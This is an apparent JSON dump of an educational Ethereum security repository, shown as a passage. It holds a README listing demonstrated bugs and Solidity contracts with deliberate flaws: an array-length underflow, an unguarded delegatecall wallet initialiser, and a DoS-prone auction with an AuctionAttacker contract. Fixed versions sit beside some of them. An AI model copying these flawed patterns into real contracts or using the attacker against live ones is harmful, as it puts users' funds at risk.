[
  {
    "path": ".gitattributes",
    "content": "*.sol linguist-language=Solidity\n"
  },
  {
    "path": ".gitignore",
    "content": ".idea/*\n*.iml\nbuild/*\nnode_modules/*\n\n"
  },
  {
    "path": "LICENSE",
    "content": "                    GNU GENERAL PUBLIC LICENSE\n                       Version 3, 29 June 2007\n\n Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>\n Everyone is permitted to copy and distribute verbatim copies\n of this license document, but changing it is not allowed.\n\n                            Preamble\n\n  The GNU General Public License is a free, copyleft license for\nsoftware and other kinds of works.\n\n  The licenses for most software and other practical works are designed\nto take away your freedom to share and change the works.  By contrast,\nthe GNU General Public License is intended to guarantee your freedom to\nshare and change all versions of a program--to make sure it remains free\nsoftware for all its users.  We, the Free Software Foundation, use the\nGNU General Public License for most of our software; it applies also to\nany other work released this way by its authors.  You can apply it to\nyour programs, too.\n\n  When we speak of free software, we are referring to freedom, not\nprice.  Our General Public Licenses are designed to make sure that you\nhave the freedom to distribute copies of free software (and charge for\nthem if you wish), that you receive source code or can get it if you\nwant it, that you can change the software or use pieces of it in new\nfree programs, and that you know you can do these things.\n\n  To protect your rights, we need to prevent others from denying you\nthese rights or asking you to surrender the rights.  Therefore, you have\ncertain responsibilities if you distribute copies of the software, or if\nyou modify it: responsibilities to respect the freedom of others.\n\n  For example, if you distribute copies of such a program, whether\ngratis or for a fee, you must pass on to the recipients the same\nfreedoms that you received.  You must make sure that they, too, receive\nor can get the source code.  And you must show them these terms so they\nknow their rights.\n\n  Developers that use the GNU GPL protect your rights with two steps:\n(1) assert copyright on the software, and (2) offer you this License\ngiving you legal permission to copy, distribute and/or modify it.\n\n  For the developers' and authors' protection, the GPL clearly explains\nthat there is no warranty for this free software.  For both users' and\nauthors' sake, the GPL requires that modified versions be marked as\nchanged, so that their problems will not be attributed erroneously to\nauthors of previous versions.\n\n  Some devices are designed to deny users access to install or run\nmodified versions of the software inside them, although the manufacturer\ncan do so.  This is fundamentally incompatible with the aim of\nprotecting users' freedom to change the software.  The systematic\npattern of such abuse occurs in the area of products for individuals to\nuse, which is precisely where it is most unacceptable.  Therefore, we\nhave designed this version of the GPL to prohibit the practice for those\nproducts.  If such problems arise substantially in other domains, we\nstand ready to extend this provision to those domains in future versions\nof the GPL, as needed to protect the freedom of users.\n\n  Finally, every program is threatened constantly by software patents.\nStates should not allow patents to restrict development and use of\nsoftware on general-purpose computers, but in those that do, we wish to\navoid the special danger that patents applied to a free program could\nmake it effectively proprietary.  To prevent this, the GPL assures that\npatents cannot be used to render the program non-free.\n\n  The precise terms and conditions for copying, distribution and\nmodification follow.\n\n                       TERMS AND CONDITIONS\n\n  0. Definitions.\n\n  \"This License\" refers to version 3 of the GNU General Public License.\n\n  \"Copyright\" also means copyright-like laws that apply to other kinds of\nworks, such as semiconductor masks.\n\n  \"The Program\" refers to any copyrightable work licensed under this\nLicense.  Each licensee is addressed as \"you\".  \"Licensees\" and\n\"recipients\" may be individuals or organizations.\n\n  To \"modify\" a work means to copy from or adapt all or part of the work\nin a fashion requiring copyright permission, other than the making of an\nexact copy.  The resulting work is called a \"modified version\" of the\nearlier work or a work \"based on\" the earlier work.\n\n  A \"covered work\" means either the unmodified Program or a work based\non the Program.\n\n  To \"propagate\" a work means to do anything with it that, without\npermission, would make you directly or secondarily liable for\ninfringement under applicable copyright law, except executing it on a\ncomputer or modifying a private copy.  Propagation includes copying,\ndistribution (with or without modification), making available to the\npublic, and in some countries other activities as well.\n\n  To \"convey\" a work means any kind of propagation that enables other\nparties to make or receive copies.  Mere interaction with a user through\na computer network, with no transfer of a copy, is not conveying.\n\n  An interactive user interface displays \"Appropriate Legal Notices\"\nto the extent that it includes a convenient and prominently visible\nfeature that (1) displays an appropriate copyright notice, and (2)\ntells the user that there is no warranty for the work (except to the\nextent that warranties are provided), that licensees may convey the\nwork under this License, and how to view a copy of this License.  If\nthe interface presents a list of user commands or options, such as a\nmenu, a prominent item in the list meets this criterion.\n\n  1. Source Code.\n\n  The \"source code\" for a work means the preferred form of the work\nfor making modifications to it.  \"Object code\" means any non-source\nform of a work.\n\n  A \"Standard Interface\" means an interface that either is an official\nstandard defined by a recognized standards body, or, in the case of\ninterfaces specified for a particular programming language, one that\nis widely used among developers working in that language.\n\n  The \"System Libraries\" of an executable work include anything, other\nthan the work as a whole, that (a) is included in the normal form of\npackaging a Major Component, but which is not part of that Major\nComponent, and (b) serves only to enable use of the work with that\nMajor Component, or to implement a Standard Interface for which an\nimplementation is available to the public in source code form.  A\n\"Major Component\", in this context, means a major essential component\n(kernel, window system, and so on) of the specific operating system\n(if any) on which the executable work runs, or a compiler used to\nproduce the work, or an object code interpreter used to run it.\n\n  The \"Corresponding Source\" for a work in object code form means all\nthe source code needed to generate, install, and (for an executable\nwork) run the object code and to modify the work, including scripts to\ncontrol those activities.  However, it does not include the work's\nSystem Libraries, or general-purpose tools or generally available free\nprograms which are used unmodified in performing those activities but\nwhich are not part of the work.  For example, Corresponding Source\nincludes interface definition files associated with source files for\nthe work, and the source code for shared libraries and dynamically\nlinked subprograms that the work is specifically designed to require,\nsuch as by intimate data communication or control flow between those\nsubprograms and other parts of the work.\n\n  The Corresponding Source need not include anything that users\ncan regenerate automatically from other parts of the Corresponding\nSource.\n\n  The Corresponding Source for a work in source code form is that\nsame work.\n\n  2. Basic Permissions.\n\n  All rights granted under this License are granted for the term of\ncopyright on the Program, and are irrevocable provided the stated\nconditions are met.  This License explicitly affirms your unlimited\npermission to run the unmodified Program.  The output from running a\ncovered work is covered by this License only if the output, given its\ncontent, constitutes a covered work.  This License acknowledges your\nrights of fair use or other equivalent, as provided by copyright law.\n\n  You may make, run and propagate covered works that you do not\nconvey, without conditions so long as your license otherwise remains\nin force.  You may convey covered works to others for the sole purpose\nof having them make modifications exclusively for you, or provide you\nwith facilities for running those works, provided that you comply with\nthe terms of this License in conveying all material for which you do\nnot control copyright.  Those thus making or running the covered works\nfor you must do so exclusively on your behalf, under your direction\nand control, on terms that prohibit them from making any copies of\nyour copyrighted material outside their relationship with you.\n\n  Conveying under any other circumstances is permitted solely under\nthe conditions stated below.  Sublicensing is not allowed; section 10\nmakes it unnecessary.\n\n  3. Protecting Users' Legal Rights From Anti-Circumvention Law.\n\n  No covered work shall be deemed part of an effective technological\nmeasure under any applicable law fulfilling obligations under article\n11 of the WIPO copyright treaty adopted on 20 December 1996, or\nsimilar laws prohibiting or restricting circumvention of such\nmeasures.\n\n  When you convey a covered work, you waive any legal power to forbid\ncircumvention of technological measures to the extent such circumvention\nis effected by exercising rights under this License with respect to\nthe covered work, and you disclaim any intention to limit operation or\nmodification of the work as a means of enforcing, against the work's\nusers, your or third parties' legal rights to forbid circumvention of\ntechnological measures.\n\n  4. Conveying Verbatim Copies.\n\n  You may convey verbatim copies of the Program's source code as you\nreceive it, in any medium, provided that you conspicuously and\nappropriately publish on each copy an appropriate copyright notice;\nkeep intact all notices stating that this License and any\nnon-permissive terms added in accord with section 7 apply to the code;\nkeep intact all notices of the absence of any warranty; and give all\nrecipients a copy of this License along with the Program.\n\n  You may charge any price or no price for each copy that you convey,\nand you may offer support or warranty protection for a fee.\n\n  5. Conveying Modified Source Versions.\n\n  You may convey a work based on the Program, or the modifications to\nproduce it from the Program, in the form of source code under the\nterms of section 4, provided that you also meet all of these conditions:\n\n    a) The work must carry prominent notices stating that you modified\n    it, and giving a relevant date.\n\n    b) The work must carry prominent notices stating that it is\n    released under this License and any conditions added under section\n    7.  This requirement modifies the requirement in section 4 to\n    \"keep intact all notices\".\n\n    c) You must license the entire work, as a whole, under this\n    License to anyone who comes into possession of a copy.  This\n    License will therefore apply, along with any applicable section 7\n    additional terms, to the whole of the work, and all its parts,\n    regardless of how they are packaged.  This License gives no\n    permission to license the work in any other way, but it does not\n    invalidate such permission if you have separately received it.\n\n    d) If the work has interactive user interfaces, each must display\n    Appropriate Legal Notices; however, if the Program has interactive\n    interfaces that do not display Appropriate Legal Notices, your\n    work need not make them do so.\n\n  A compilation of a covered work with other separate and independent\nworks, which are not by their nature extensions of the covered work,\nand which are not combined with it such as to form a larger program,\nin or on a volume of a storage or distribution medium, is called an\n\"aggregate\" if the compilation and its resulting copyright are not\nused to limit the access or legal rights of the compilation's users\nbeyond what the individual works permit.  Inclusion of a covered work\nin an aggregate does not cause this License to apply to the other\nparts of the aggregate.\n\n  6. Conveying Non-Source Forms.\n\n  You may convey a covered work in object code form under the terms\nof sections 4 and 5, provided that you also convey the\nmachine-readable Corresponding Source under the terms of this License,\nin one of these ways:\n\n    a) Convey the object code in, or embodied in, a physical product\n    (including a physical distribution medium), accompanied by the\n    Corresponding Source fixed on a durable physical medium\n    customarily used for software interchange.\n\n    b) Convey the object code in, or embodied in, a physical product\n    (including a physical distribution medium), accompanied by a\n    written offer, valid for at least three years and valid for as\n    long as you offer spare parts or customer support for that product\n    model, to give anyone who possesses the object code either (1) a\n    copy of the Corresponding Source for all the software in the\n    product that is covered by this License, on a durable physical\n    medium customarily used for software interchange, for a price no\n    more than your reasonable cost of physically performing this\n    conveying of source, or (2) access to copy the\n    Corresponding Source from a network server at no charge.\n\n    c) Convey individual copies of the object code with a copy of the\n    written offer to provide the Corresponding Source.  This\n    alternative is allowed only occasionally and noncommercially, and\n    only if you received the object code with such an offer, in accord\n    with subsection 6b.\n\n    d) Convey the object code by offering access from a designated\n    place (gratis or for a charge), and offer equivalent access to the\n    Corresponding Source in the same way through the same place at no\n    further charge.  You need not require recipients to copy the\n    Corresponding Source along with the object code.  If the place to\n    copy the object code is a network server, the Corresponding Source\n    may be on a different server (operated by you or a third party)\n    that supports equivalent copying facilities, provided you maintain\n    clear directions next to the object code saying where to find the\n    Corresponding Source.  Regardless of what server hosts the\n    Corresponding Source, you remain obligated to ensure that it is\n    available for as long as needed to satisfy these requirements.\n\n    e) Convey the object code using peer-to-peer transmission, provided\n    you inform other peers where the object code and Corresponding\n    Source of the work are being offered to the general public at no\n    charge under subsection 6d.\n\n  A separable portion of the object code, whose source code is excluded\nfrom the Corresponding Source as a System Library, need not be\nincluded in conveying the object code work.\n\n  A \"User Product\" is either (1) a \"consumer product\", which means any\ntangible personal property which is normally used for personal, family,\nor household purposes, or (2) anything designed or sold for incorporation\ninto a dwelling.  In determining whether a product is a consumer product,\ndoubtful cases shall be resolved in favor of coverage.  For a particular\nproduct received by a particular user, \"normally used\" refers to a\ntypical or common use of that class of product, regardless of the status\nof the particular user or of the way in which the particular user\nactually uses, or expects or is expected to use, the product.  A product\nis a consumer product regardless of whether the product has substantial\ncommercial, industrial or non-consumer uses, unless such uses represent\nthe only significant mode of use of the product.\n\n  \"Installation Information\" for a User Product means any methods,\nprocedures, authorization keys, or other information required to install\nand execute modified versions of a covered work in that User Product from\na modified version of its Corresponding Source.  The information must\nsuffice to ensure that the continued functioning of the modified object\ncode is in no case prevented or interfered with solely because\nmodification has been made.\n\n  If you convey an object code work under this section in, or with, or\nspecifically for use in, a User Product, and the conveying occurs as\npart of a transaction in which the right of possession and use of the\nUser Product is transferred to the recipient in perpetuity or for a\nfixed term (regardless of how the transaction is characterized), the\nCorresponding Source conveyed under this section must be accompanied\nby the Installation Information.  But this requirement does not apply\nif neither you nor any third party retains the ability to install\nmodified object code on the User Product (for example, the work has\nbeen installed in ROM).\n\n  The requirement to provide Installation Information does not include a\nrequirement to continue to provide support service, warranty, or updates\nfor a work that has been modified or installed by the recipient, or for\nthe User Product in which it has been modified or installed.  Access to a\nnetwork may be denied when the modification itself materially and\nadversely affects the operation of the network or violates the rules and\nprotocols for communication across the network.\n\n  Corresponding Source conveyed, and Installation Information provided,\nin accord with this section must be in a format that is publicly\ndocumented (and with an implementation available to the public in\nsource code form), and must require no special password or key for\nunpacking, reading or copying.\n\n  7. Additional Terms.\n\n  \"Additional permissions\" are terms that supplement the terms of this\nLicense by making exceptions from one or more of its conditions.\nAdditional permissions that are applicable to the entire Program shall\nbe treated as though they were included in this License, to the extent\nthat they are valid under applicable law.  If additional permissions\napply only to part of the Program, that part may be used separately\nunder those permissions, but the entire Program remains governed by\nthis License without regard to the additional permissions.\n\n  When you convey a copy of a covered work, you may at your option\nremove any additional permissions from that copy, or from any part of\nit.  (Additional permissions may be written to require their own\nremoval in certain cases when you modify the work.)  You may place\nadditional permissions on material, added by you to a covered work,\nfor which you have or can give appropriate copyright permission.\n\n  Notwithstanding any other provision of this License, for material you\nadd to a covered work, you may (if authorized by the copyright holders of\nthat material) supplement the terms of this License with terms:\n\n    a) Disclaiming warranty or limiting liability differently from the\n    terms of sections 15 and 16 of this License; or\n\n    b) Requiring preservation of specified reasonable legal notices or\n    author attributions in that material or in the Appropriate Legal\n    Notices displayed by works containing it; or\n\n    c) Prohibiting misrepresentation of the origin of that material, or\n    requiring that modified versions of such material be marked in\n    reasonable ways as different from the original version; or\n\n    d) Limiting the use for publicity purposes of names of licensors or\n    authors of the material; or\n\n    e) Declining to grant rights under trademark law for use of some\n    trade names, trademarks, or service marks; or\n\n    f) Requiring indemnification of licensors and authors of that\n    material by anyone who conveys the material (or modified versions of\n    it) with contractual assumptions of liability to the recipient, for\n    any liability that these contractual assumptions directly impose on\n    those licensors and authors.\n\n  All other non-permissive additional terms are considered \"further\nrestrictions\" within the meaning of section 10.  If the Program as you\nreceived it, or any part of it, contains a notice stating that it is\ngoverned by this License along with a term that is a further\nrestriction, you may remove that term.  If a license document contains\na further restriction but permits relicensing or conveying under this\nLicense, you may add to a covered work material governed by the terms\nof that license document, provided that the further restriction does\nnot survive such relicensing or conveying.\n\n  If you add terms to a covered work in accord with this section, you\nmust place, in the relevant source files, a statement of the\nadditional terms that apply to those files, or a notice indicating\nwhere to find the applicable terms.\n\n  Additional terms, permissive or non-permissive, may be stated in the\nform of a separately written license, or stated as exceptions;\nthe above requirements apply either way.\n\n  8. Termination.\n\n  You may not propagate or modify a covered work except as expressly\nprovided under this License.  Any attempt otherwise to propagate or\nmodify it is void, and will automatically terminate your rights under\nthis License (including any patent licenses granted under the third\nparagraph of section 11).\n\n  However, if you cease all violation of this License, then your\nlicense from a particular copyright holder is reinstated (a)\nprovisionally, unless and until the copyright holder explicitly and\nfinally terminates your license, and (b) permanently, if the copyright\nholder fails to notify you of the violation by some reasonable means\nprior to 60 days after the cessation.\n\n  Moreover, your license from a particular copyright holder is\nreinstated permanently if the copyright holder notifies you of the\nviolation by some reasonable means, this is the first time you have\nreceived notice of violation of this License (for any work) from that\ncopyright holder, and you cure the violation prior to 30 days after\nyour receipt of the notice.\n\n  Termination of your rights under this section does not terminate the\nlicenses of parties who have received copies or rights from you under\nthis License.  If your rights have been terminated and not permanently\nreinstated, you do not qualify to receive new licenses for the same\nmaterial under section 10.\n\n  9. Acceptance Not Required for Having Copies.\n\n  You are not required to accept this License in order to receive or\nrun a copy of the Program.  Ancillary propagation of a covered work\noccurring solely as a consequence of using peer-to-peer transmission\nto receive a copy likewise does not require acceptance.  However,\nnothing other than this License grants you permission to propagate or\nmodify any covered work.  These actions infringe copyright if you do\nnot accept this License.  Therefore, by modifying or propagating a\ncovered work, you indicate your acceptance of this License to do so.\n\n  10. Automatic Licensing of Downstream Recipients.\n\n  Each time you convey a covered work, the recipient automatically\nreceives a license from the original licensors, to run, modify and\npropagate that work, subject to this License.  You are not responsible\nfor enforcing compliance by third parties with this License.\n\n  An \"entity transaction\" is a transaction transferring control of an\norganization, or substantially all assets of one, or subdividing an\norganization, or merging organizations.  If propagation of a covered\nwork results from an entity transaction, each party to that\ntransaction who receives a copy of the work also receives whatever\nlicenses to the work the party's predecessor in interest had or could\ngive under the previous paragraph, plus a right to possession of the\nCorresponding Source of the work from the predecessor in interest, if\nthe predecessor has it or can get it with reasonable efforts.\n\n  You may not impose any further restrictions on the exercise of the\nrights granted or affirmed under this License.  For example, you may\nnot impose a license fee, royalty, or other charge for exercise of\nrights granted under this License, and you may not initiate litigation\n(including a cross-claim or counterclaim in a lawsuit) alleging that\nany patent claim is infringed by making, using, selling, offering for\nsale, or importing the Program or any portion of it.\n\n  11. Patents.\n\n  A \"contributor\" is a copyright holder who authorizes use under this\nLicense of the Program or a work on which the Program is based.  The\nwork thus licensed is called the contributor's \"contributor version\".\n\n  A contributor's \"essential patent claims\" are all patent claims\nowned or controlled by the contributor, whether already acquired or\nhereafter acquired, that would be infringed by some manner, permitted\nby this License, of making, using, or selling its contributor version,\nbut do not include claims that would be infringed only as a\nconsequence of further modification of the contributor version.  For\npurposes of this definition, \"control\" includes the right to grant\npatent sublicenses in a manner consistent with the requirements of\nthis License.\n\n  Each contributor grants you a non-exclusive, worldwide, royalty-free\npatent license under the contributor's essential patent claims, to\nmake, use, sell, offer for sale, import and otherwise run, modify and\npropagate the contents of its contributor version.\n\n  In the following three paragraphs, a \"patent license\" is any express\nagreement or commitment, however denominated, not to enforce a patent\n(such as an express permission to practice a patent or covenant not to\nsue for patent infringement).  To \"grant\" such a patent license to a\nparty means to make such an agreement or commitment not to enforce a\npatent against the party.\n\n  If you convey a covered work, knowingly relying on a patent license,\nand the Corresponding Source of the work is not available for anyone\nto copy, free of charge and under the terms of this License, through a\npublicly available network server or other readily accessible means,\nthen you must either (1) cause the Corresponding Source to be so\navailable, or (2) arrange to deprive yourself of the benefit of the\npatent license for this particular work, or (3) arrange, in a manner\nconsistent with the requirements of this License, to extend the patent\nlicense to downstream recipients.  \"Knowingly relying\" means you have\nactual knowledge that, but for the patent license, your conveying the\ncovered work in a country, or your recipient's use of the covered work\nin a country, would infringe one or more identifiable patents in that\ncountry that you have reason to believe are valid.\n\n  If, pursuant to or in connection with a single transaction or\narrangement, you convey, or propagate by procuring conveyance of, a\ncovered work, and grant a patent license to some of the parties\nreceiving the covered work authorizing them to use, propagate, modify\nor convey a specific copy of the covered work, then the patent license\nyou grant is automatically extended to all recipients of the covered\nwork and works based on it.\n\n  A patent license is \"discriminatory\" if it does not include within\nthe scope of its coverage, prohibits the exercise of, or is\nconditioned on the non-exercise of one or more of the rights that are\nspecifically granted under this License.  You may not convey a covered\nwork if you are a party to an arrangement with a third party that is\nin the business of distributing software, under which you make payment\nto the third party based on the extent of your activity of conveying\nthe work, and under which the third party grants, to any of the\nparties who would receive the covered work from you, a discriminatory\npatent license (a) in connection with copies of the covered work\nconveyed by you (or copies made from those copies), or (b) primarily\nfor and in connection with specific products or compilations that\ncontain the covered work, unless you entered into that arrangement,\nor that patent license was granted, prior to 28 March 2007.\n\n  Nothing in this License shall be construed as excluding or limiting\nany implied license or other defenses to infringement that may\notherwise be available to you under applicable patent law.\n\n  12. No Surrender of Others' Freedom.\n\n  If conditions are imposed on you (whether by court order, agreement or\notherwise) that contradict the conditions of this License, they do not\nexcuse you from the conditions of this License.  If you cannot convey a\ncovered work so as to satisfy simultaneously your obligations under this\nLicense and any other pertinent obligations, then as a consequence you may\nnot convey it at all.  For example, if you agree to terms that obligate you\nto collect a royalty for further conveying from those to whom you convey\nthe Program, the only way you could satisfy both those terms and this\nLicense would be to refrain entirely from conveying the Program.\n\n  13. Use with the GNU Affero General Public License.\n\n  Notwithstanding any other provision of this License, you have\npermission to link or combine any covered work with a work licensed\nunder version 3 of the GNU Affero General Public License into a single\ncombined work, and to convey the resulting work.  The terms of this\nLicense will continue to apply to the part which is the covered work,\nbut the special requirements of the GNU Affero General Public License,\nsection 13, concerning interaction through a network will apply to the\ncombination as such.\n\n  14. Revised Versions of this License.\n\n  The Free Software Foundation may publish revised and/or new versions of\nthe GNU General Public License from time to time.  Such new versions will\nbe similar in spirit to the present version, but may differ in detail to\naddress new problems or concerns.\n\n  Each version is given a distinguishing version number.  If the\nProgram specifies that a certain numbered version of the GNU General\nPublic License \"or any later version\" applies to it, you have the\noption of following the terms and conditions either of that numbered\nversion or of any later version published by the Free Software\nFoundation.  If the Program does not specify a version number of the\nGNU General Public License, you may choose any version ever published\nby the Free Software Foundation.\n\n  If the Program specifies that a proxy can decide which future\nversions of the GNU General Public License can be used, that proxy's\npublic statement of acceptance of a version permanently authorizes you\nto choose that version for the Program.\n\n  Later license versions may give you additional or different\npermissions.  However, no additional obligations are imposed on any\nauthor or copyright holder as a result of your choosing to follow a\nlater version.\n\n  15. Disclaimer of Warranty.\n\n  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY\nAPPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT\nHOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY\nOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\nPURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM\nIS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF\nALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n\n  16. Limitation of Liability.\n\n  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS\nTHE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY\nGENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE\nUSE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF\nDATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD\nPARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),\nEVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF\nSUCH DAMAGES.\n\n  17. Interpretation of Sections 15 and 16.\n\n  If the disclaimer of warranty and limitation of liability provided\nabove cannot be given local legal effect according to their terms,\nreviewing courts shall apply local law that most closely approximates\nan absolute waiver of all civil liability in connection with the\nProgram, unless a warranty or assumption of liability accompanies a\ncopy of the Program in return for a fee.\n\n                     END OF TERMS AND CONDITIONS\n\n            How to Apply These Terms to Your New Programs\n\n  If you develop a new program, and you want it to be of the greatest\npossible use to the public, the best way to achieve this is to make it\nfree software which everyone can redistribute and change under these terms.\n\n  To do so, attach the following notices to the program.  It is safest\nto attach them to the start of each source file to most effectively\nstate the exclusion of warranty; and each file should have at least\nthe \"copyright\" line and a pointer to where the full notice is found.\n\n    <one line to give the program's name and a brief idea of what it does.>\n    Copyright (C) <year>  <name of author>\n\n    This program is free software: you can redistribute it and/or modify\n    it under the terms of the GNU General Public License as published by\n    the Free Software Foundation, either version 3 of the License, or\n    (at your option) any later version.\n\n    This program is distributed in the hope that it will be useful,\n    but WITHOUT ANY WARRANTY; without even the implied warranty of\n    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n    GNU General Public License for more details.\n\n    You should have received a copy of the GNU General Public License\n    along with this program.  If not, see <http://www.gnu.org/licenses/>.\n\nAlso add information on how to contact you by electronic and paper mail.\n\n  If the program does terminal interaction, make it output a short\nnotice like this when it starts in an interactive mode:\n\n    <program>  Copyright (C) <year>  <name of author>\n    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.\n    This is free software, and you are welcome to redistribute it\n    under certain conditions; type `show c' for details.\n\nThe hypothetical commands `show w' and `show c' should show the appropriate\nparts of the General Public License.  Of course, your program's commands\nmight be different; for a GUI interface, you would use an \"about box\".\n\n  You should also get your employer (if you work as a programmer) or school,\nif any, to sign a \"copyright disclaimer\" for the program, if necessary.\nFor more information on this, and how to apply and follow the GNU GPL, see\n<http://www.gnu.org/licenses/>.\n\n  The GNU General Public License does not permit incorporating your program\ninto proprietary programs.  If your program is a subroutine library, you\nmay consider it more useful to permit linking proprietary applications with\nthe library.  If this is what you want to do, use the GNU Lesser General\nPublic License instead of this License.  But first, please read\n<http://www.gnu.org/philosophy/why-not-lgpl.html>.\n"
  },
  {
    "path": "README.md",
    "content": "# ethereum-security\n\n## :exclamation: :warning: DO NOT USE THE CONTRACTS IN THIS REPOSITORY. THEY ARE VULNERABLE TO SECURITY BUGS. :warning: :exclamation:\n\nRepository with some Ethereum security bugs.\nThe bugs and fixes are demonstrated using Mocha tests.\n\nBugs added so far:\n\n* Overflow\n* Underflow\n* Reentrancy (DAO hack)\n* Delegatecall (Parity hack style)\n* DOS (e.g. stay as an Auction leader forever)\n* DOS (unbounded array loop)\n* Force ether (relying on the invariant this.balance == 0)\n* Tx.origin\n* Unchecked send() output\n* Storage override (commonly used in honeypots - or genuine bugs)\n* Array storage override (length underflow - storage override)\n* `extcodesize` bypassed when used to check if the caller is a contract\n\nRun:\n\n```\ntruffle test\n```\n\nTo debug or run the test suite in more detail:\n\n1. Modify `truffle.js` with:\n\n```\nmodule.exports = {\n  networks: {\n    development: {\n      host: \"localhost\",\n      port: 8545,\n      network_id: \"*\", // Match any network id\n      gas : 4000000\n    }\n  }\n};\n```\n\nThis will run the tests in a local test blockchain. Then `testrpc` & `truffle console` or just `truffle develop` can be run to have an interactive console and be able to see the RPC methods that have been called in the process, and therefore, the transaction hashes (if there was a transaction).\n\nOnce you know the transaction hash you want to inspect in more detail, it can be debugged running `truffle debug <tx_hash>`.\nSee the transaction with `web3.eth.getTransaction(\"<tx_hash>\")` or the transaction receipt: `web3.eth.getTransactionReceipt(\"<tx_hash>\")`\n\nAlso, an individual test can be run using:\n`truffle test test/<test_folder>/<test_name>.js`\n"
  },
  {
    "path": "contracts/Migrations.sol",
    "content": "pragma solidity ^0.4.17;\n\ncontract Migrations {\n  address public owner;\n  uint public last_completed_migration;\n\n  modifier restricted() {\n    if (msg.sender == owner) _;\n  }\n\n  function Migrations() public {\n    owner = msg.sender;\n  }\n\n  function setCompleted(uint completed) public restricted {\n    last_completed_migration = completed;\n  }\n\n  function upgrade(address new_address) public restricted {\n    Migrations upgraded = Migrations(new_address);\n    upgraded.setCompleted(last_completed_migration);\n  }\n}\n"
  },
  {
    "path": "contracts/arraystorageoverride/ArrayStorageOverride.sol",
    "content": "pragma solidity ^0.4.23;\n\ncontract ArrayStorageOverride {\n\n    bool public isHacked;\n    uint[] public array;\n\n    function push(uint _value) public {\n        array.push(_value);\n    }\n\n    function pop() public {\n        array.length--;\n    }\n\n    function insert(uint _key, uint _value) public {\n        require(_key < array.length);\n        array[_key] = _value;\n    }\n\n    function size() public view returns (uint) {\n        return array.length;\n    }\n}\n"
  },
  {
    "path": "contracts/arraystorageoverride/ArrayStorageOverrideFixed.sol",
    "content": "pragma solidity ^0.4.23;\n\ncontract ArrayStorageOverrideFixed {\n\n    bool public isHacked;\n    uint[] public array;\n\n    function pop() public {\n        // This is a possible fix to avoid underflows\n        require(array.length > 0);\n        array.length--;\n    }\n\n    function push(uint _value) public {\n        array.push(_value);\n    }\n\n    function insert(uint _key, uint _value) public {\n        require(_key < array.length);\n        array[_key] = _value;\n    }\n\n    function size() public view returns (uint) {\n        return array.length;\n    }\n}\n"
  },
  {
    "path": "contracts/delegatecall/Wallet.sol",
    "content": "pragma solidity ^0.4.23;\n\nimport \"./WalletLibrary.sol\";\n\ncontract Wallet {\n\n    address owner;\n    address walletLibrary;\n\n    function Wallet(address _walletLibrary) public {\n        walletLibrary = _walletLibrary;\n        walletLibrary.delegatecall(bytes4(keccak256(\"initWallet(address)\")), msg.sender);\n    }\n\n    function deposit() public payable {\n        walletLibrary.delegatecall(bytes4(keccak256(\"deposit()\")));\n    }\n\n    function withdraw(uint _amount) public {\n        walletLibrary.delegatecall(bytes4(keccak256(\"withdraw(uint256)\")), _amount);\n    }\n\n    function () public payable {\n        walletLibrary.delegatecall(msg.data);\n    }\n\n    function getOwner() public view returns (address) {\n        return owner;\n    }\n}\n"
  },
  {
    "path": "contracts/delegatecall/WalletLibrary.sol",
    "content": "pragma solidity ^0.4.23;\n\ncontract WalletLibrary {\n\n    address owner;\n\n    event InitWallet(address addr);\n\n    function initWallet(address _owner) {\n        InitWallet(_owner);\n        owner = _owner;\n    }\n\n    function getOwner() public view returns (address) {\n        return owner;\n    }\n\n    function deposit() public payable {\n    }\n\n    function withdraw(uint _amount) public returns (bool success) {\n        require(msg.sender == owner);\n        return owner.send(_amount);\n    }\n}\n"
  },
  {
    "path": "contracts/delegatecall/WalletLibraryFixed.sol",
    "content": "pragma solidity ^0.4.23;\n\ncontract WalletLibraryFixed {\n\n    address owner;\n    event InitWallet(address addr);\n\n    modifier notInitialized() {\n        require(owner == 0x0);\n        _;\n    }\n\n    function initWallet(address _owner) notInitialized() {\n        InitWallet(_owner);\n        owner = _owner;\n    }\n\n    function getOwner() public view returns (address) {\n        return owner;\n    }\n\n    function deposit() public payable {\n    }\n\n    function withdraw(uint _amount) public returns (bool success) {\n        require(msg.sender == owner);\n        return owner.send(_amount);\n    }\n}\n"
  },
  {
    "path": "contracts/dos/Auction.sol",
    "content": "pragma solidity ^0.4.23;\n\ncontract Auction {\n\n    address currentLeader;\n    uint highestBid;\n\n    function bid() public payable {\n        require(msg.value > highestBid);\n        currentLeader.transfer(highestBid);\n\n        currentLeader = msg.sender;\n        highestBid = msg.value;\n    }\n\n    function getCurrentLeader() public view returns (address) {\n        return currentLeader;\n    }\n\n    function getHighestBid() public view returns (uint) {\n        return highestBid;\n    }\n}\n"
  },
  {
    "path": "contracts/dos/AuctionAttacker.sol",
    "content": "pragma solidity ^0.4.23;\n\nimport \"./Auction.sol\";\n\ncontract AuctionAttacker {\n\n    Auction auction;\n\n    function AuctionAttacker(address _auction) public {\n        auction = Auction(_auction);\n    }\n\n    function bidAuction() public payable {\n        auction.bid.value(msg.value)();\n    }\n\n}\n"
  },
  {
